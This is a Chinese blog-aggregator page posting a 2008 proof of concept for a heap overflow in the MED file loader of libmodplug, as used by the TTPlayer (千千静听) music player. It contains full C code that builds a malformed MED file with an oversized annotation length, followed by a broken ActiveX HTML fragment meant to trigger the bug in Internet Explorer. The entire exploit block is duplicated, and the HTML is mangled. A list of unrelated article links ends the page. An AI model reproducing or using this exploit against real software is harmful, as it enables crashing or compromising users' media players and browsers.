千千静听 med 文件格式堆溢出
来源:互联网 发布:pop端口号 编辑:程序博客网 时间:2024/04/28 09:34
下面是构造问题文件的代码,最后是使用最新版本千千静听的 ax 写的 poc.
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
*/
/*
author: 耿冬
e-mail: lcwlgsgd@163.com
date: 2008/02/25
*/
#include
#include
#pragma pack(1)
typedef struct tagMEDMODULEHEADER
{
DWORD id; // MMD1-MMD3
DWORD modlen; // Size of file
DWORD song; // Position in file for this song
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present)
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;
typedef struct tagMMD0SAMPLE
{
WORD rep, replen;
BYTE midich;
BYTE midipreset;
BYTE svol;
signed char strans;
} MMD0SAMPLE;
// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63];
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;
typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt;
DWORD annolen;
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;
#pragma pack()
// Byte swapping functions from the GNU C Library and libsdl
/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) /
(__extension__ /
({ unsigned short int __bsx = (x); /
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif
/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) /
(__extension__ /
({ unsigned int __bsx = (x); /
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | /
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) |
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24));
}
#endif
#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif
int main()
{
MEDMODULEHEADER mmh;
MMD0SONGHEADER msh;
MMD0EXP mex;
FILE* file;
long p;
memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));
p = 0;
mmh.id = 0x30444D4D; // version = ’0’
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p);
p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p);
p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);
mex.annotxt = bswapBE32(p);
file = fopen("test.s3m", "wb+");
if ( file == NULL )
{
printf("create file failed!/n");
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);
while ( ftell(file) < 0x1000 )
{
fwrite("AAAAAAAAAAAAAAAAAAAA", 1, 16, file);
}
fclose(file);
printf("successed!/n");
}
return 0;
}
/*
最新的千千静听提供了 ax, 下面是在 Ie 中触发此漏洞。会导致 ie 崩溃。
*/
"ttp" WIDTH="250" HEIGHT="400" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03">
"button" NAME="test" CAPTION="test" xxxxx="Test()">
"JavaScript">
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
*/
/*
author: 耿冬
e-mail: lcwlgsgd@163.com
date: 2008/02/25
*/
#include
#include
#pragma pack(1)
typedef struct tagMEDMODULEHEADER
{
DWORD id; // MMD1-MMD3
DWORD modlen; // Size of file
DWORD song; // Position in file for this song
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present)
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;
typedef struct tagMMD0SAMPLE
{
WORD rep, replen;
BYTE midich;
BYTE midipreset;
BYTE svol;
signed char strans;
} MMD0SAMPLE;
// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63];
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;
typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt;
DWORD annolen;
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;
#pragma pack()
// Byte swapping functions from the GNU C Library and libsdl
/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) /
(__extension__ /
({ unsigned short int __bsx = (x); /
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif
/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) /
(__extension__ /
({ unsigned int __bsx = (x); /
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | /
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) |
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24));
}
#endif
#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif
int main()
{
MEDMODULEHEADER mmh;
MMD0SONGHEADER msh;
MMD0EXP mex;
FILE* file;
long p;
memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));
p = 0;
mmh.id = 0x30444D4D; // version = ’0’
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p);
p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p);
p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);
mex.annotxt = bswapBE32(p);
file = fopen("test.s3m", "wb+");
if ( file == NULL )
{
printf("create file failed!/n");
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);
while ( ftell(file) < 0x1000 )
{
fwrite("AAAAAAAAAAAAAAAAAAAA", 1, 16, file);
}
fclose(file);
printf("successed!/n");
}
return 0;
}
/*
最新的千千静听提供了 ax, 下面是在 Ie 中触发此漏洞。会导致 ie 崩溃。
*/
"ttp" WIDTH="250" HEIGHT="400" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03">
"button" NAME="test" CAPTION="test" xxxxx="Test()">
"JavaScript">
- 千千静听 med 文件格式堆溢出利用
- 千千静听 med 文件格式堆溢出
- 千千静听 med 文件格式堆溢出的成功利用 | 鬼仔????s Blog
- 千千静听ttp_mod.dll解析med文件堆溢出的利用分析_导航已取消
- 千千静听 更新记录
- 关于千千静听
- MusicBox - 仿千千静听
- 千千静听下载
- Ubuntu 的千千静听
- 千千静听的危机
- 用千千静听唱歌
- 千千静听引索
- 千千静听引索
- wince版千千静听出炉
- 千千静听 wma转换mp3
- Audacious - GNOME的’千千静听’
- 千千静听 歌词制作器
- 山寨作品-千千静听
- tomcat+mysql 中文乱码和存储大文件问题解决
- 2008年《中国最具价值品牌500强》的名单(2008中国500强企业名单1-500)
- 后排到前排
- Alisoft技术BLOG,欢迎大家交流
- C#程序运行效果
- 千千静听 med 文件格式堆溢出
- AJAX开源
- [笔记]css2对表格增加的一些东东
- 关于GridView的Group分组显示(downmoon)
- ASP.NET 2.0 控件开发速成教程:生成复合控件
- 管理
- 人,不能固化自己。。
- 如何配置Oracle SQL Developer1.5.1连接TimesTen内存数据库
- CSDN──技术圈人的归属
